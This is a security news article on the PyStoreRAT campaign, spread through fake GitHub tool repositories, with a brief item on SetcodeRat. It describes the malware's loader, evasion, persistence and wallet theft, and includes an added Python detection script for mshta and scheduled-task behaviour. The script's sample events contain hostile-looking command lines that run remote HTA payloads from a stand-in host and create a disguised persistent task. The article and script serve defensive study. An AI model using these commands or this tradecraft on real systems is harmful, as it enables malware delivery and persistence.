
Beware: How Fake OSINT and GPT Utility GitHub Repos Are Being Used to Distribute PyStoreRAT Malware

Cybersecurity researchers have flagged a new campaign exploiting GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) known as PyStoreRAT.

According to Morphisec researcher Yonatan Edri, these repositories are often portrayed as development utilities or OSINT tools, containing only a few lines of code that download a remote HTA file and execute it using ‘mshta.exe’. PyStoreRAT is termed a "modular, multi-stage" implant that can execute a variety of payloads, including EXE, DLL, PowerShell, and others. It also delivers an information stealer dubbed Rhadamanthys as a secondary payload.

The attack chains disseminate the malware via Python or JavaScript loader stubs embedded in GitHub repositories that masquerade as OSINT tools, DeFi bots, GPT wrappers, or security utilities appealing to analysts and developers. The earliest indications of the campaign date back to mid-June 2025, with a consistent release of malicious repositories since.

Threat actors typically create new GitHub accounts or use dormant ones to publish these repositories. They slip the malicious payload in through "maintenance" commits after the tools gain traction and appear on GitHub’s trending lists. Many tools in these repositories function incorrectly, often just displaying static menus, while their limited operations are designed to give them a façade of legitimacy.

This operation triggers the execution of remote HTA payloads, which deploy the PyStoreRAT malware, allowing it to gather system information, check for administrative privileges, and search for cryptocurrency wallet files linked to services like Ledger Live and Trezor.

The loader stub also checks for installed antivirus software, looking in particular for names associated with notable cybersecurity companies, to evade detection. If such software is detected, it launches "mshta.exe" via "cmd.exe"; if not, it executes directly.

Persistence is established by creating scheduled tasks that masquerade as NVIDIA app updates. Ultimately, the malware contacts an external server to execute various commands, such as downloading other malicious payloads, running PowerShell commands directly in memory, and deleting scheduled tasks to cover its tracks.
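The behaviours described above (mshta.exe pulling a remote HTA, mshta.exe launched through cmd.exe, and a scheduled task named after NVIDIA updates) translate directly into process-creation detections. The following is an added example, not code from the article or from Morphisec; it runs over constructed sample events, and the assumption that the loader stub spawns mshta.exe from a Python or Node interpreter is ours, not a claim made in the article.

```python
import re
from dataclasses import dataclass
from typing import List

@dataclass
class ProcEvent:
    parent_image: str   # image name of the parent process
    image: str          # image name of the created process
    cmdline: str        # full command line of the created process

# Patterns derived from the behaviours the article describes.
REMOTE_HTA = re.compile(r"\bmshta(?:\.exe)?\b.*?\bhttps?://", re.I)
NVIDIA_TASK = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b.*?nvidia", re.I)
# Assumption (ours): the Python/JS loader stub is the direct parent of mshta.exe.
INTERPRETERS = {"python.exe", "pythonw.exe", "node.exe"}

def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every detection an event triggers."""
    hits = []
    image, parent = ev.image.lower(), ev.parent_image.lower()
    if image == "mshta.exe":
        if REMOTE_HTA.search(ev.cmdline):
            hits.append("mshta_remote_hta")          # HTA fetched from a URL
        if parent == "cmd.exe":
            hits.append("mshta_via_cmd")             # AV-detected branch
        if parent in INTERPRETERS:
            hits.append("mshta_from_script_interpreter")
    if image == "schtasks.exe" and NVIDIA_TASK.search(ev.cmdline):
        hits.append("schtasks_nvidia_lookalike")     # persistence masquerade
    return hits

def scan(events: List[ProcEvent]):
    """Keep only events that fired at least one detection."""
    return [(ev.image, hits) for ev in events if (hits := classify(ev))]

# Constructed sample telemetry; hosts and task names are invented.
SAMPLE_EVENTS = [
    ProcEvent("python.exe", "mshta.exe", 'mshta.exe "https://example.invalid/update.hta"'),
    ProcEvent("cmd.exe", "mshta.exe", "mshta https://example.invalid/u.hta"),
    ProcEvent("cmd.exe", "schtasks.exe",
              'schtasks /create /tn "NVIDIA App Update" /tr "mshta.exe https://example.invalid/p.hta" /sc minute'),
    ProcEvent("explorer.exe", "mshta.exe", "mshta.exe C:\\Users\\user\\local.hta"),
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(image, hits)
```

The local-HTA event and the svchost event produce no hits, which is the point: the rules key on the remote fetch, the cmd.exe or interpreter parent, and the NVIDIA task name rather than on mshta.exe alone.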

While the identities of the threat actors remain unknown, the presence of Russian-language artifacts suggests a possibly Eastern European origin. Edri noted that PyStoreRAT’s design signifies a transition to modular, adaptable implants that can effectively circumvent security measures.

In a related development, QiAnXin, a Chinese security vendor, announced another new RAT called SetcodeRat, which has likely been disseminating across China since October 2025. It exploits malvertising techniques to infect hundreds of computers, including those of governmental and enterprise users.

SetcodeRat disguises itself as genuine installers for widely-used software. It proceeds with its operations only if the victim’s system is set to certain Chinese languages, verifying its geographical relevance before launching an executable that facilitates the RAT’s payload execution. It can perform various malicious activities, including taking screenshots, logging keystrokes, and collecting network information.
